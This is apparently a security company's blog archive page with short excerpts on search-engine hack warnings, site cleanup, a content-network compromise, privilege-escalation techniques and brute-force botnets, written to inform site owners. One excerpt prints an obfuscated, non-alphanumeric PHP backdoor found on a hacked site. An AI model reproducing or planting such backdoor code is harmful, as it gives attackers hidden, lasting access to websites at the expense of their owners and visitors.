Understanding Search Engine Warnings – Part I – Google – This Site May Be Hacked

If you have any questions about malware, blacklisting, or security in general, send them to us: contact@sucuri.net and we will answer here. For all the “Ask Sucuri” answers, go here.


Question: I just found out that my site is being flagged on Google’s search engine results page with the message “This site may be hacked”. What does it mean?

Answer: This is a good question and one we see often from our clients. We see it so often that we decided to do a series on each type of blacklist warnings that show up on search engines. These are the warnings that we will cover in this series:

Read More

Cleaning Up Your WordPress Site with the Free Sucuri Plugin

If your site has been recently hacked and you are trying to clean it up yourself, we recommend that you use SiteCheck Malware Scanner, our Free WordPress plugin to help you during that task.

The plugin has a collection of useful tools that can guide you along the way. The steps provided here are not final, and there are some variations that require more work, but by just following these steps, you will get very far. We will also not rely on any specific signature or malware strings, since those can easily be evaded by the clever bad guys.

As always, if you need professional help, the Sucuri team is here for you.


Read More

Ask Sucuri: Non-alphanumeric Backdoors

If you have any questions about malware, blacklisting, or security in general, send them to contact@sucuri.net and we will write a post about it and share. For all the “Ask Sucuri” answers, go here.


Question: My site got hacked and I am seeing this backdoor with no alpha numeric characters. What is it doing?
@$_[]=@!+_; $__=@${_}>>$_;$_[]=$__;$_[]=@_;$_[((++$__)+($__++ ))].=$_;
$_[]=++$__; $_[]=$_[--$__][$__>>$__];$_[$__].=(($__+$__)+ $_[$__-$__]).($__+$__+$__)+$_[$__-$__];
$_[$__+$__] =($_[$__][$__>>$__]).($_[$__][$__]^$_[$__][($__< <$__)-$__] );
$_[$__+$__] .=($_[$__][($__<<$__)-($__/$__)])^($_[$__][$__] );
$_[$__+$__] .=($_[$__][$__+$__])^$_[$__][($__<<$__)-$__ ];
$_=$ 
$_[$__+ $__] ;$_[@-_]($_[@!+_] );

Answer: Backdoors are tools used by attackers to help them maintain access to the sites they compromise. The harder it is to find the backdoor, the better for the attackers, since it will likely remain undetected allowing them to reinfect or regain access to the site whenever they want.

This backdoor is a very good example of a sneaky one. No alpha numeric characters, no direct function calls or anything like that. So what is it doing? We asked one of our developers, Yorman Arias, to help decode it.


Read More

The Dangers External Services Present To Your Website

Today the Washington Post reported that they were victims of hack, orchestrated by the Syrian Electronic Army.

This attack is interesting because it sheds light into the anatomy of attacks that appear sophisticated, but is something we’re seeing on a daily basis.

Yesterday, we wrote about Phishing and Joomla. The important point being the emphasis on how Phishing attacks work and for what reasons. In the examples we discussed one of the reasons being financial gain, in today’s example however we can look at how it was used to redirect traffic for a cause. In the story however are two very unique attacks being leveraged, it’s hard to assume how they were used, but it provides for interesting insight into intentions.

External Services

In the article they describe that the attackers were able to attack multiple media outlets at one time. They go on to describe that their attack came specifically from their content sharing network, which happens to be Outbrain. In fact, Outbrain, at the time this was being written was still experiencing down time and had acknowledge a compromise:

Sucuri Outbrain Hacked

If you’re not aware, Outbrain is a very popular content recommendation service leveraged by many media outlets. Has something to do with some awesome magic they apply to understanding who is visiting your site and what the most appropriate content is for that individual. All fancy stuff and above my head, but what I do know is what this, along with so many others, do to the security of your website.

When we look at the security chain what you are always looking for is the weakest link, one of the factors that often contributes to the weakness is the consumption of external services and / or your ability to ensure the integrity of said service. Today, many outlets like Washington Post, Time and CNN found out the hard way why that is.

In this instance, the attackers were able to get access to an Outbrain online console and in doing so where able to inject redirects to various configurations. No one is clear at what level they were able to compromise the console, but it is known that it affect three media outlets at a minimum.

They went on to share an image of their access as proof of their success:

SEA-Outbrain

This, unfortunately, is but one example of the impacts of an external service.

A few weeks back we shared other information on the OpenX ad network being compromised as well. In this scenario, the attackers injected a backdoor into the installation package, allowing them to gain access to any website that uses it. While fundamentally different than what occurred with Outbrain, the impact can be just as catastrophic.

In this scenario, it appears the hacktivists were more concerned with broader awareness and publicity than they were in real nefarious acts. Just imagine the impact some of the brands impacted: CNN, Time, Washington Post could have had on followers around the world if the redirect included some Blackhole variant or other similar type payload designed to have lasting impacts on your computers. These brands are huge conglomerates, even if only for 30 minutes, the shear traffic that would have been affected is mind blowing.

Regardless, the point is not lost. As websites become more secure, attackers will continue to find new creative means of accomplishing their goals, this is but another example of the type of creativity we can come and are expecting and experiencing. We have to remember the motto that many live by..

“Own one, Own them all.”

From a Site Compromise to Full Root Access – Bad Server Management – Part III

When an attacker manages to compromise and get access to a website, they won’t stop there. They will aim to gain full root (admin) access to the entire server. If there are more websites hosted on the server being attacked, It is likely they will attempt to compromise every single one of them.

How can an attacker escalate their privileges? How can they go from FTP-only access to getting root on the server? In this series of articles we will show some techniques that attackers are using to go from confined FTP/web access, to full root level access on a server.

In the previous articles of this series, we talked about symlinking to root and using local exploits to increase their privileges. However, attackers often don’t need this level of work when the server is not well managed and/or properly secured. They can leverage a quick path to root (admin) with little trouble.


Read More

Google Transparency Report – Malware Distribution

Google just released their Malware Distribution Transparency Report, sharing the amount of sites compromised or distributing malware detected by their systems (Safe Browsing program).

Google’s Safe Browsing program started in 2006 and since has become one of the most useful blacklists to detect and report on compromised sites. They flag around 10,000 different sites per day, which are being used for over 1 billion browser (Chrome, Firefox And Safari) users.

What is really scary from their report is the amount of legitimate compromised sites hosting malware compared to sites developed by the bad guys for malicious purposes. For example, in the first week of Jun/2013, 37,000 legitimate sites were compromised to host malware. At the same time, they only identified around 4,000 sites that were developed for the unique purpose of infecting people.


Read More

From a Site Compromise to Full Root Access – Local Root Exploits – Part II

When an attacker manages to compromise and get access to a website, they won’t likely stop there, they will aim to gain full root (admin) access to the entire server. If there are more websites hosted on the server being attacked, It is likely they will attempt to compromise every single one of them.

How can an attacker escalate their privileges? How can they go from FTP-only access to getting root on the server? In this series of articles we will show some techniques that attackers are using to go from confined FTP/web access, to full root level access on a server.


Read More

From a Site Compromise to Full Root Access – Symlinks to Root – Part I

When an attacker manages to compromise and get access to a website, they won’t likely stop there, they will aim to gain full root (admin) access to the entire server. If there are more websites hosted on the server being attacked, It is likely they will attempt to compromise every single one of them.

How can an attacker escalate their privileges? How can they go from FTP-only access to getting root on the server? In this series of articles we will show some techniques that attackers are using to go from confined FTP/web access, to full root level access on a server.

Read More

Who Really Owns Your Website? “Please Stop Hotlinking My Easing Script — Use a Real CDN Instead.”

For the last few days, we have had some customers come to us worried thinking that their websites were compromised with some type of pop-up malware. Every time they visited their own site they would get a strange pop up:

“Please stop hotlinking my easing script — use a real CDN instead. Many thanks”

What is going on?

We did some Google searches and found hundreds of threads with people worried about the same thing. Out of no where, that pop-up was showing up on their web sites. Were they all hacked?

Screen Shot 2013-05-02 at 4.26.02 PM

Read More

Brute Force Attacks and Their Consequences

There is a lot of interesting discussion going on at the moment across the interwebs on the intention of the latest string of Brute Force attacks, much of which I find very interesting. While I can’t repudiate what is being said, I can add my own insight into the anatomy post attack success.

How Are These Attacks Happening

First, let’s address the first, and most important piece of information, the how. What we know, based on the data we reported earlier is that a very large majority of the attacks are coming from local PC boxes. How do we know? We’re seeing the IP’s and their incoming signatures.

A botnet is a collection of internet-connected programs communicating with other similar programs in order to perform tasks. – Wikipedia

What is the end-game?


Read More